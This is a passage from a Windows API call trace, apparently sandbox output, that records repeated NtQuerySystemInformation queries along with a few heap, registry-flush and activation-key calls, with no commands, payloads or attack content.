(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x20, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef60, Length=0x20, ResultLength=0x0) [0238.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1b0, Length=0x20, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x38, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0d0, Length=0x20, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f050, Length=0x20, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f050, Length=0x20, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f050, Length=0x20, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x38, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0d0, Length=0x20, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f050, Length=0x20, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f050, Length=0x20, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f050, Length=0x20, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x38, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0d0, Length=0x20, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x20, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f060, Length=0x20, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f5e0, Length=0x20, ResultLength=0x0) [0238.187] GetTickCount () returned 0x117bdf3 [0238.187] GetProcessHeap () returned 0x269489b0000 [0238.187] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x18) returned 0x26949b273a0 [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f390, Length=0x30, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f210, Length=0x30, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x38, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x30, ResultLength=0x0) [0238.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1d0, Length=0x30, ResultLength=0x0) [0238.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f130, Length=0x20, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1d0, Length=0x30, ResultLength=0x0) [0238.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f110, Length=0x30, ResultLength=0x0) [0238.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1c0, Length=0x30, ResultLength=0x0) [0238.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f080, Length=0x18, ResultLength=0x0) [0238.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.410] RegFlushKey (hKey=0x330) returned 0x0 [0238.414] NtLockProductActivationKeys (pPrivateVer=0x0, pSafeMode=0x0) returned 0x0 [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f290, Length=0x38, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1d0, Length=0x30, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f130, Length=0x20, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f1d0, Length=0x30, ResultLength=0x0) [0238.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f110, Length=0x30, ResultLength=0x0) [0238.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f500, Length=0x28, ResultLength=0x0) [0238.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f500, Length=0x28, ResultLength=0x0) [0238.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f3e0, Length=0x58, ResultLength=0x0) [0238.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x38, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f110, Length=0x28, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f110, Length=0x28, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f110, Length=0x28, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f110, Length=0x28, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f180, Length=0x28, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x38, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x38, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f200, Length=0x28, ResultLength=0x0) [0238.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f200, Length=0x28, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x38, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x38, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f070, Length=0x20, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eff0, Length=0x20, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eff0, Length=0x20, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eff0, Length=0x20, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f240, Length=0x20, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x38, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x20, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x20, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x20, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f2d0, Length=0x38, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f160, Length=0x20, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x20, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x20, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f0e0, Length=0x20, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.433] NtQuerySystemInformation 